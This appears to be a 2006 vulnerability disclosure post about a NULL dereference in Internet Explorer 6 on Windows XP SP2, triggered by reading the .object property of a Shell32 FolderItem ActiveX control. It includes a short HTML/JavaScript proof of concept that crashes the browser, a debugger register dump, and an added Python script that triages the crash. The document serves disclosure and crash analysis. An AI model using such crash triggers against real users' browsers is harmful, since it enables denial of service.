The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Accessing the object reference of this control triggers a NULL dereference in the security check :-)
<object id="target" classid="clsid:FEF10FA2-355E-4e06-9381-9B24D7F7CC88">
</object>
<script>
// Reading the control's .object property is what reaches the security check
var a = document.getElementById('target');
alert(a.object);
</script>
Demonstration
eax=0000eb6c ebx=00000000 ecx=00000000
edx=09105b62 esi=0013b1ac edi=03cec120
eip=7cb86ce4 esp=0013aee4 ebp=0013b184
SHELL32!CFolder::_SecurityCheck:
7cb86ce4 83790c00 cmp dword ptr [ecx+0xc],0x0 ds:0023:0000000c=????????
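An added triage example, not part of the original post: it parses the debugger output above, recomputes the effective address of the faulting `cmp` from `ecx` and the `0xc` displacement, and classifies the access. The function names and the 64 KB threshold constant are choices made for this example.

```python
import re

# Debugger output copied verbatim from the post.
DUMP = """\
eax=0000eb6c ebx=00000000 ecx=00000000
edx=09105b62 esi=0013b1ac edi=03cec120
eip=7cb86ce4 esp=0013aee4 ebp=0013b184
SHELL32!CFolder::_SecurityCheck:
7cb86ce4 83790c00 cmp dword ptr [ecx+0xc],0x0 ds:0023:0000000c=????????
"""

# Windows keeps the lowest 64 KB of user address space unmapped (no-access).
NULL_PAGE_LIMIT = 0x10000

def parse_registers(dump):
    """Return {register: value} for every 'reg=hex32' pair in the dump."""
    pairs = re.findall(r"\b(e[a-z]{2})=([0-9a-f]{8})\b", dump)
    return {name: int(value, 16) for name, value in pairs}

def parse_memory_operand(dump):
    """Return (base_register, displacement) of the first '[reg+0xNN]' operand."""
    m = re.search(r"\[(e[a-z]{2})(?:([+-])(?:0x)?([0-9a-f]+))?\]", dump)
    if m is None:
        return None
    disp = int(m.group(3), 16) if m.group(3) else 0
    return m.group(1), (-disp if m.group(2) == "-" else disp)

def triage(dump):
    """Recompute the faulting address and classify the access."""
    regs, operand = parse_registers(dump), parse_memory_operand(dump)
    if operand is None or operand[0] not in regs:
        return {"verdict": "unknown"}
    base, disp = operand
    address = (regs[base] + disp) & 0xFFFFFFFF
    if regs[base] == 0 and address < NULL_PAGE_LIMIT:
        verdict = "null-pointer dereference"
    elif address < NULL_PAGE_LIMIT:
        verdict = "near-NULL access"
    else:
        verdict = "other"
    symbol = re.search(r"^(\S+!\S+):$", dump, re.M)
    return {"function": symbol.group(1) if symbol else None,
            "base_register": base, "field_offset": disp,
            "address": address, "verdict": verdict}

if __name__ == "__main__":
    print(triage(DUMP))
```

The recomputed address matches the `0000000c` the debugger prints after `ds:0023:`, which confirms that the object pointer in `ecx` was NULL when the field at offset `0xc` was read.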
This bug will be added to the OSVDB:
Microsoft IE FolderItem Object NULL Dereference
Friday, July 14, 2006